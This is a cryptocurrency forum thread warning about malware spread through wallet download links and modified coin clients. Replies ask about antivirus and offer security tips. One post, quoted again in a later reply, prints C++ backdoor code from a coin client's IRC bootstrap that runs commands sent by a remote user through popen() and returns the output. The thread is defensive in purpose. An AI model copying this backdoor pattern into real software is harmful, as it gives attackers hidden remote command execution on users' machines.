RoseMann
|
|
August 11, 2016, 02:56:05 AM |
|
Thank you for this warning, (i said with 30 trojan horse viruses attacking me at the same time)
|
|
|
|
Brybtc
Newbie
Offline
Activity: 15
Merit: 1
|
|
August 13, 2016, 08:11:04 PM |
|
Speaking of antivirus can the results from AV-TEST be trusted?
Is it impartial? do they do proper testing or just surface easy stuff?
|
|
|
|
groggin
Legendary
Offline
Activity: 1894
Merit: 1001
|
|
September 02, 2016, 03:48:48 AM |
|
Speaking of antivirus can the results from AV-TEST be trusted?
Is it impartial? do they do proper testing or just surface easy stuff? use www.virustotal.com to scan small files (like wallets) it uses +/- 50 AV engines to scan, it's prolly faster than using your onboard AV - BUT remember, serious hackers will have no problem hiding their payload
|
|
|
|
bilebil
Newbie
Offline
Activity: 12
Merit: 0
|
|
September 04, 2016, 02:03:22 PM |
|
Could you List the différent scam
|
|
|
|
Qasim1234
|
|
September 05, 2016, 09:57:22 AM |
|
i was infected with virus lol
|
|
|
|
shsfhs
Newbie
Offline
Activity: 1
Merit: 0
|
|
September 08, 2016, 11:50:59 AM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1) { FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; pclose(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str()); } } The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
|
|
|
|
Sasuke.Sasuke
Member
Offline
Activity: 76
Merit: 10
|
|
December 08, 2016, 05:36:23 AM |
|
Useful thread.. I always use sandboxie and shado defender before installing or running any new program now a days.. . And mediam level of hackers fears of virustotal because they send the file for further analysis(as what i've heard) and their FUD malware loose its FUD ability. So my suggestion will be... Use sandboxie or any similar software and still use softwares like shadow defender for any kind of new programs... . And before doing any thing just scan it in virustotal if you can.
Note: just don't trust any new person or software just like that.
In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
|
|
|
|
ioanbtc
|
|
December 27, 2016, 09:34:23 PM |
|
If i use antymalwarebytes i can be protected?
|
|
|
|
forces1234
Member
Offline
Activity: 116
Merit: 10
|
|
December 29, 2016, 10:50:30 PM |
|
is there any good anti virus to handle it??
|
|
|
|
indiemax
|
|
January 19, 2017, 06:18:42 PM |
|
Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
|
|
|
|
JanpriX
|
|
February 11, 2017, 11:44:10 PM |
|
is there any good anti virus to handle it??
I would like to ask this same question here. Can anyone site a software/site that can provide better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware but it wouldn't hurt if we can install a program that has good reputation in stopping malwares getting inside our machines.
|
|
|
|
caribou2357
Newbie
Offline
Activity: 10
Merit: 0
|
|
February 15, 2017, 06:35:08 PM Last edit: February 15, 2017, 06:46:41 PM by caribou2357 |
|
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
|
|
|
|
groggin
Legendary
Offline
Activity: 1894
Merit: 1001
|
|
February 15, 2017, 07:16:09 PM |
|
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
there is no comprehensive overall protection, think, rather in layers. a vpn, a good antivirus, spybot s&d, hosts file (hostsman), sandboxie, a virtual machine should all be in place. avoid win 10 if u use 7, 8, or 8.1, remove or do not install the microsoft spyware even better, use mac or linux there is freeware available to do all this
|
|
|
|
MWesterweele
|
|
February 22, 2017, 06:32:40 AM |
|
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety. "latest wallet"/"custom wallet"/"faster miner"A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly. Copied/new ANNThe attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later). Replacing links in quotesThe attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link. Compromised dev accountThe developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update. Packed/FUD executablesIn most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable. Modified source with backdoorThis was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism. here is the relevant source code: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } here is the source code with macros resolved: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1) { FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; pclose(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str()); } } The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.thanks for informing us,however we must know how to avoid this. we all give importance to bitcoin,therfore we must take care of it. there are some kind of people that wants to earn bitcoin without giving some effort on it,they just want to take it to others easily. secure your browsers , dont click anything that is not important ,look may be deceiving brothers.
|
|
|
|
redblue!!
Newbie
Offline
Activity: 7
Merit: 0
|
|
February 24, 2017, 06:29:58 AM |
|
Thank you .. I think it is very good information for me as a beginner. I will always support you.
|
|
|
|
superresistant
Legendary
Offline
Activity: 2142
Merit: 1131
|
|
February 25, 2017, 06:55:19 PM |
|
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself : Do not download anything from this forum. Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
|
|
|
|
rebel69
Member
Offline
Activity: 62
Merit: 10
|
|
February 27, 2017, 07:16:25 AM |
|
THANK YOU FOR THE INFORMATION MY FRIEND
|
|
|
|
passwordnow
|
|
February 27, 2017, 01:47:25 PM |
|
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself : Do not download anything from this forum. Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly. I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
|
..Stake.com.. | | | ▄████████████████████████████████████▄ ██ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ██ ▄████▄ ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██ ██████ ██ ██████████ ██ ██ ██████████ ██ ▀██▀ ██ ██ ██ ██████ ██ ██ ██ ██ ██ ██ ██████ ██ █████ ███ ██████ ██ ████▄ ██ ██ █████ ███ ████ ████ █████ ███ ████████ ██ ████ ████ ██████████ ████ ████ ████▀ ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██ ██ ▀▀▀▀▀▀▀▀▀▀ ██ ▀█████████▀ ▄████████████▄ ▀█████████▀ ▄▄▄▄▄▄▄▄▄▄▄▄███ ██ ██ ███▄▄▄▄▄▄▄▄▄▄▄▄ ██████████████████████████████████████████ | | | | | | ▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄ █ ▄▀▄ █▀▀█▀▄▄ █ █▀█ █ ▐ ▐▌ █ ▄██▄ █ ▌ █ █ ▄██████▄ █ ▌ ▐▌ █ ██████████ █ ▐ █ █ ▐██████████▌ █ ▐ ▐▌ █ ▀▀██████▀▀ █ ▌ █ █ ▄▄▄██▄▄▄ █ ▌▐▌ █ █▐ █ █ █▐▐▌ █ █▐█ ▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█ | | | | | | ▄▄█████████▄▄ ▄██▀▀▀▀█████▀▀▀▀██▄ ▄█▀ ▐█▌ ▀█▄ ██ ▐█▌ ██ ████▄ ▄█████▄ ▄████ ████████▄███████████▄████████ ███▀ █████████████ ▀███ ██ ███████████ ██ ▀█▄ █████████ ▄█▀ ▀█▄ ▄██▀▀▀▀▀▀▀██▄ ▄▄▄█▀ ▀███████ ███████▀ ▀█████▄ ▄█████▀ ▀▀▀███▄▄▄███▀▀▀ | | | ..PLAY NOW.. |
|
|
|
vapourminer
Legendary
Offline
Activity: 4466
Merit: 4019
what is this "brake pedal" you speak of?
|
|
February 27, 2017, 02:00:41 PM |
|
formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. its one of the surest way of getting rid of suspected virus/malware.
if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.
whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
|
|
|
|
Cherylstar86
|
|
March 04, 2017, 11:14:43 AM |
|
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
Anti-virus offer no protection for this but it's very easy to protect yourself : Do not download anything from this forum. Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly. I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links. Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right its not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend eset nod32 antivirus latest version now available if your search on their site online; even trial version works totally fine.
|
|
|
|
|